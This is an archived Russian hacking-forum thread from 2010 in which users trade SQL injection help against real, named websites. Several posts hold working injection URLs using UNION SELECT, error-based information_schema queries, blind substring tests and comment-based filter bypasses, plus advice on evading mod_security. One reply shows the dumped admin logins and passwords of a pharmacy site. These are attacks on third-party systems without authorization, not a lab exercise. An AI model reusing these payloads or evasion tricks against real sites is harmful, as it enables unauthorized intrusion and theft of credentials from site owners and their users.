ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11881  
Старый 10.03.2010, 16:29
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от YuNi|[c  
карочи я вообще задолбался раскрутит эту скул:


никак не могу обходит фильтр кавычки, всё перепробовал

может кто посоветует обход
Цитата:
http://www.bourdela.tv/index.php?topic=2')and(1=1)--+
тоже одинаковый результат
 
Ответить с цитированием

  #11882  
Старый 10.03.2010, 17:39
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:

Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис
 
Ответить с цитированием

  #11883  
Старый 10.03.2010, 17:41
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от Pashkela  
2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:

Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис
там не form, а /*form*/, но за ответ спасибо, почитаю
 
Ответить с цитированием

  #11884  
Старый 10.03.2010, 17:48
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

YuNi|[c,
Цитата:
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #11885  
Старый 10.03.2010, 18:22
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
Провел на форуме:
29833

Репутация: 0
По умолчанию

Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:

Цитата:
http://www.pharmabort.ru/page.php?id=-16%20and%20%28SELECT%20sipt%28concat%280x3b,login, password%29,1,1%29%20from%20users%20limit%200,1%29 =1
Логин и пасс админа не выводит...
 
Ответить с цитированием

  #11886  
Старый 10.03.2010, 19:20
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от Sharsky  
Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:



Логин и пасс админа не выводит...
Цитата:
http://www.pharmabort.ru/page.php?id=-15 UNION SELECT 1,2,3,concat(0x7e,pharma_admins.login,0x7e,pharma_ admins.password,0x7e,pharma_admins.name,0x7e),5,6, 7,8,9,10,11,12,13,14,15+FROM+pharmabort.pharma_adm ins+LIMIT+0,1--
~mooncat~sql~netservice~
LIMIT+1,1--
~cons1~cons~Консультант
 
Ответить с цитированием

  #11887  
Старый 10.03.2010, 19:30
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

уже не надо этот скул
 
Ответить с цитированием

  #11888  
Старый 10.03.2010, 20:09
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
Провел на форуме:
29833

Репутация: 0
По умолчанию

[Feldmarschall], ничего не выводит =(
 
Ответить с цитированием

  #11889  
Старый 10.03.2010, 20:27
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
Провел на форуме:
29833

Репутация: 0
По умолчанию

Удалил все пробели, все ровно не выводит. Вы проходили по ссыле? Посмотрите сами.
 
Ответить с цитированием

  #11890  
Старый 10.03.2010, 21:15
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Подскажите, почему не отображаются данные?
Код:
http://www.spbpost.ru/index.php?page_id=69+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28%29,database%28%29%29,11,12,13,14,15,16,17+limit+1,1+--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ